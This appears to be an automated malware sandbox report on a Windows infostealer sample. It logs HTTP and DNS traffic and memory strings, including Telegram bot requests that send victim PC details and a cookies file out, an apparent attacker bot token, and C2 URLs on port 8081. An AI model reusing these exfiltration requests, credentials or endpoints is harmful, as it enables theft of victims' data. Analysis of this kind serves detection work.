Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.vvtrade.vn
Source: unknown HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 01:34:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 01:35:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/we1/OuqGbJkzwhU.crl0
Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2148911676.0000000007931000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r4.crt0
Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/we1.crt05
Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.vvtrade.vn
Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/s/we1/Ges0%
Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000006.00000002.4473666032.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 00000006.00000002.4473666032.0000000005713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005208000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005617000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 00000006.00000002.4473666032.0000000005749000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: svchost.exe, 00000003.00000002.4473198929.0000000005337000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C6EAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C6ED6A
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_00EDED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C6EAFF
